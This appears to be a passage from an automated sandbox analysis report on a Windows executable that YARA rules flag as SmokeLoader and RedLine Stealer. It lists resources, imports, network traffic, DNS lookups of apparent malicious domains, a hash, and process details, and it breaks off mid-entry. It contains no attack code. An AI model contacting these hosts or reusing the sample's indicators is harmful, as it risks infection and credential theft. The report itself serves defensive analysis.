RT_ICON	0x280988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x281830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x2820d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x282640	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x284be8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x285c90	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x286618	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_STRING	0x286d20	0x664	data
RT_STRING	0x287388	0x59e	data
RT_STRING	0x287928	0x29a	data
RT_STRING	0x287bc8	0x248	data
RT_STRING	0x287e10	0x582	data
RT_GROUP_ICON	0x286a80	0x68	data
RT_GROUP_ICON	0x274938	0x4c	data
RT_GROUP_ICON	0x280920	0x68	data
RT_GROUP_ICON	0x27aa80	0x68	data
RT_VERSION	0x286ae8	0x238	data

DLL	Import
KERNEL32.dll	GetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
USER32.dll	CharLowerBuffA
GDI32.dll	GetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
ADVAPI32.dll	MapGenericMask

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 28, 2023 10:42:32.626749039 CEST	49698	80	192.168.2.3	188.114.97.7
May 28, 2023 10:42:32.643356085 CEST	80	49698	188.114.97.7	192.168.2.3
May 28, 2023 10:42:32.643559933 CEST	49698	80	192.168.2.3	188.114.97.7
May 28, 2023 10:42:32.643846989 CEST	49698	80	192.168.2.3	188.114.97.7
May 28, 2023 10:42:32.643882036 CEST	49698	80	192.168.2.3	188.114.97.7
May 28, 2023 10:42:32.660356998 CEST	80	49698	188.114.97.7	192.168.2.3
May 28, 2023 10:42:32.660419941 CEST	80	49698	188.114.97.7	192.168.2.3
May 28, 2023 10:42:32.794167995 CEST	80	49698	188.114.97.7	192.168.2.3
May 28, 2023 10:42:32.794229984 CEST	80	49698	188.114.97.7	192.168.2.3
May 28, 2023 10:42:32.794404030 CEST	49698	80	192.168.2.3	188.114.97.7
May 28, 2023 10:42:32.801357985 CEST	49698	80	192.168.2.3	188.114.97.7
May 28, 2023 10:42:32.801403999 CEST	49698	80	192.168.2.3	188.114.97.7
May 28, 2023 10:42:32.817797899 CEST	80	49698	188.114.97.7	192.168.2.3
May 28, 2023 10:42:32.817853928 CEST	80	49698	188.114.97.7	192.168.2.3
May 28, 2023 10:42:32.886226892 CEST	80	49698	188.114.97.7	192.168.2.3
May 28, 2023 10:42:32.886286020 CEST	80	49698	188.114.97.7	192.168.2.3
May 28, 2023 10:42:32.886405945 CEST	49698	80	192.168.2.3	188.114.97.7
May 28, 2023 10:42:33.224350929 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:33.469502926 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:33.469827890 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:33.486999035 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:33.931035042 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.219666004 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.219733953 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.219870090 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.465065956 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.465104103 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.465127945 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.465153933 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.465260983 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.465419054 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.709892988 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.709956884 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.710007906 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.710053921 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.710052967 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.710103035 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.710150003 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.710150957 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.710200071 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.710207939 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.710247993 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.710303068 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.954205036 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954272032 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954317093 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954428911 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954431057 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.954477072 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954534054 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.954562902 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954617977 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954632998 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.954668999 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954749107 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954766035 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.954796076 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954840899 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954853058 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.954890013 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954936028 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.954942942 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.954983950 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.955030918 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.955041885 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:34.955079079 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:34.955136061 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.199152946 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199218035 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199345112 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199345112 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.199393034 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199459076 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.199472904 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199521065 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199593067 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.199688911 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199764967 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199811935 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199835062 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.199867010 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199919939 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.199924946 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.199974060 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200021029 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.200021029 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200067997 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200114965 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200118065 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.200182915 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200239897 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.200251102 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200346947 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200392962 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200397968 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.200439930 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200484037 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200486898 CEST	49699	80	192.168.2.3	211.119.84.112
May 28, 2023 10:42:35.200530052 CEST	80	49699	211.119.84.112	192.168.2.3
May 28, 2023 10:42:35.200575113 CEST	80	49699	211.119.84.112	192.168.2.3

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 28, 2023 10:42:32.589546919 CEST	192.168.2.3	8.8.8.8	0xc257	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:32.904278994 CEST	192.168.2.3	8.8.8.8	0xf86a	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:38.041315079 CEST	192.168.2.3	8.8.8.8	0xd6e3	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:38.355895042 CEST	192.168.2.3	8.8.8.8	0x3c92	Standard query (0)	speedlab.com.eg	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:38.886869907 CEST	192.168.2.3	8.8.8.8	0xde50	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:39.331614017 CEST	192.168.2.3	8.8.8.8	0x243c	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:43.070905924 CEST	192.168.2.3	8.8.8.8	0xb406	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:43.229671001 CEST	192.168.2.3	8.8.8.8	0x2ed4	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:44.401875973 CEST	192.168.2.3	8.8.8.8	0x77ce	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:44.431500912 CEST	192.168.2.3	8.8.8.8	0x8f29	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:44.761403084 CEST	192.168.2.3	8.8.8.8	0xe73	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:45.594129086 CEST	192.168.2.3	8.8.8.8	0x8189	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:45.890947104 CEST	192.168.2.3	8.8.8.8	0xf47c	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:47.954268932 CEST	192.168.2.3	8.8.8.8	0xc85b	Standard query (0)	jp.imgjeoighw.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:51.638860941 CEST	192.168.2.3	8.8.8.8	0xe5cb	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:54.714950085 CEST	192.168.2.3	8.8.8.8	0x5de4	Standard query (0)	speedlab.com.eg	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:55.529817104 CEST	192.168.2.3	8.8.8.8	0x7a51	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:55.681421041 CEST	192.168.2.3	8.8.8.8	0x53d3	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:56.441360950 CEST	192.168.2.3	8.8.8.8	0xea1d	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:58.053306103 CEST	192.168.2.3	8.8.8.8	0x1bec	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:58.214225054 CEST	192.168.2.3	8.8.8.8	0x510a	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:58.662609100 CEST	192.168.2.3	8.8.8.8	0xe283	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:42:59.579483986 CEST	192.168.2.3	8.8.8.8	0x96de	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:00.048898935 CEST	192.168.2.3	8.8.8.8	0xe540	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:00.516808987 CEST	192.168.2.3	8.8.8.8	0x54a7	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:00.802059889 CEST	192.168.2.3	8.8.8.8	0x113f	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:02.195458889 CEST	192.168.2.3	8.8.8.8	0xd66d	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:02.941838980 CEST	192.168.2.3	8.8.8.8	0x92d5	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:03.434844971 CEST	192.168.2.3	8.8.8.8	0x101b	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:03.660417080 CEST	192.168.2.3	8.8.8.8	0xe0	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:03.803510904 CEST	192.168.2.3	8.8.8.8	0x8f41	Standard query (0)	speedlab.com.eg	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:03.819369078 CEST	192.168.2.3	8.8.8.8	0xb3c7	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:04.294127941 CEST	192.168.2.3	8.8.8.8	0x1e46	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:04.570935965 CEST	192.168.2.3	8.8.8.8	0x85fb	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:06.353408098 CEST	192.168.2.3	8.8.8.8	0x31d6	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:08.111479998 CEST	192.168.2.3	8.8.8.8	0x3334	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:08.327681065 CEST	192.168.2.3	8.8.8.8	0x2d2a	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:08.336113930 CEST	192.168.2.3	8.8.8.8	0x2e88	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:08.402429104 CEST	192.168.2.3	8.8.8.8	0xa3e4	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:08.588644981 CEST	192.168.2.3	8.8.8.8	0x46df	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:08.848572016 CEST	192.168.2.3	8.8.8.8	0x608b	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:08.851380110 CEST	192.168.2.3	8.8.8.8	0xda79	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:09.456056118 CEST	192.168.2.3	8.8.8.8	0x8697	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:09.716829062 CEST	192.168.2.3	8.8.8.8	0x3a74	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:10.560178041 CEST	192.168.2.3	8.8.8.8	0x1df7	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:11.273484945 CEST	192.168.2.3	8.8.8.8	0x7c33	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:12.075567961 CEST	192.168.2.3	8.8.8.8	0xac40	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:12.679893017 CEST	192.168.2.3	8.8.8.8	0xe9c	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:14.498408079 CEST	192.168.2.3	8.8.8.8	0xe7f0	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:14.852189064 CEST	192.168.2.3	8.8.8.8	0x9473	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:15.460896015 CEST	192.168.2.3	8.8.8.8	0x6efc	Standard query (0)	speedlab.com.eg	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:15.613418102 CEST	192.168.2.3	8.8.8.8	0xfbca	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:15.983059883 CEST	192.168.2.3	8.8.8.8	0x5091	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:16.217313051 CEST	192.168.2.3	8.8.8.8	0xd095	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:16.640816927 CEST	192.168.2.3	8.8.8.8	0xca04	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:17.003221989 CEST	192.168.2.3	8.8.8.8	0x450d	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:18.466842890 CEST	192.168.2.3	8.8.8.8	0x1f9b	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:18.764915943 CEST	192.168.2.3	8.8.8.8	0x2085	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:19.449069977 CEST	192.168.2.3	8.8.8.8	0x3028	Standard query (0)	adsmanager.facebook.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:19.758980036 CEST	192.168.2.3	8.8.8.8	0x1826	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:20.059639931 CEST	192.168.2.3	8.8.8.8	0xad6c	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:20.712938070 CEST	192.168.2.3	8.8.8.8	0xa0b6	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:20.815661907 CEST	192.168.2.3	8.8.8.8	0x9518	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:21.989151955 CEST	192.168.2.3	8.8.8.8	0xe689	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:22.024241924 CEST	192.168.2.3	8.8.8.8	0x3f8a	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:22.393553972 CEST	192.168.2.3	8.8.8.8	0xa2d	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:22.731909990 CEST	192.168.2.3	8.8.8.8	0xe43	Standard query (0)	ss.apjeoighw.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:23.587229967 CEST	192.168.2.3	8.8.8.8	0x5e33	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:23.942609072 CEST	192.168.2.3	8.8.8.8	0x4fc2	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:24.187830925 CEST	192.168.2.3	8.8.8.8	0x30c4	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:25.135301113 CEST	192.168.2.3	8.8.8.8	0x5cc3	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:26.377245903 CEST	192.168.2.3	8.8.8.8	0x36ac	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:28.015558004 CEST	192.168.2.3	8.8.8.8	0xbebf	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:29.523540020 CEST	192.168.2.3	8.8.8.8	0xf4f1	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:30.456631899 CEST	192.168.2.3	8.8.8.8	0x7f	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:30.880661011 CEST	192.168.2.3	8.8.8.8	0x89c9	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:31.084322929 CEST	192.168.2.3	8.8.8.8	0xc813	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:31.538268089 CEST	192.168.2.3	8.8.8.8	0xea73	Standard query (0)	adsmanager.facebook.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:32.162396908 CEST	192.168.2.3	8.8.8.8	0x72a9	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:32.421588898 CEST	192.168.2.3	8.8.8.8	0x5905	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:33.629355907 CEST	192.168.2.3	8.8.8.8	0x4431	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:34.475882053 CEST	192.168.2.3	8.8.8.8	0x75e7	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:35.990720034 CEST	192.168.2.3	8.8.8.8	0x64e9	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:37.213870049 CEST	192.168.2.3	8.8.8.8	0x6cdd	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:37.239511967 CEST	192.168.2.3	8.8.8.8	0x5481	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:38.759414911 CEST	192.168.2.3	8.8.8.8	0xa202	Standard query (0)	shsplatform.co.uk	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:39.408296108 CEST	192.168.2.3	8.8.8.8	0xa76c	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:40.758038044 CEST	192.168.2.3	8.8.8.8	0xcb14	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:42.292027950 CEST	192.168.2.3	8.8.8.8	0xed1c	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:42.686049938 CEST	192.168.2.3	8.8.8.8	0xd5a1	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:44.206152916 CEST	192.168.2.3	8.8.8.8	0xba0a	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:45.733243942 CEST	192.168.2.3	8.8.8.8	0x8d9d	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:46.970834017 CEST	192.168.2.3	8.8.8.8	0xef30	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:47.335722923 CEST	192.168.2.3	8.8.8.8	0xb441	Standard query (0)	adsmanager.facebook.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:47.361634970 CEST	192.168.2.3	8.8.8.8	0x6476	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:47.854331970 CEST	192.168.2.3	8.8.8.8	0xaa8d	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:48.617662907 CEST	192.168.2.3	8.8.8.8	0xfe12	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:50.046684027 CEST	192.168.2.3	8.8.8.8	0x6bb1	Standard query (0)	ss.apjeoighw.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:50.121634960 CEST	192.168.2.3	8.8.8.8	0x2973	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:51.641613007 CEST	192.168.2.3	8.8.8.8	0x2561	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:52.415997028 CEST	192.168.2.3	8.8.8.8	0xcfb6	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:57.150626898 CEST	192.168.2.3	8.8.8.8	0xb748	Standard query (0)	adsmanager.facebook.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:57.771193981 CEST	192.168.2.3	8.8.8.8	0x9b9b	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
May 28, 2023 10:43:59.824630022 CEST	192.168.2.3	8.8.8.8	0xdec8	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
May 28, 2023 10:44:04.964651108 CEST	192.168.2.3	8.8.8.8	0x92cb	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	10:41:55
Start date:	28/05/2023
Path:	C:\Users\user\Desktop\01860199.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\01860199.exe
Imagebase:	0x400000
File size:	289280 bytes
MD5 hash:	3D8207E1CE6762FF10DB118BEE3BD99B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.380036043.0000000000859000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.380107918.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	5
Start time:	10:42:37
Start date:	28/05/2023
Path:	C:\Users\user\AppData\Local\Temp\D804.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\D804.exe
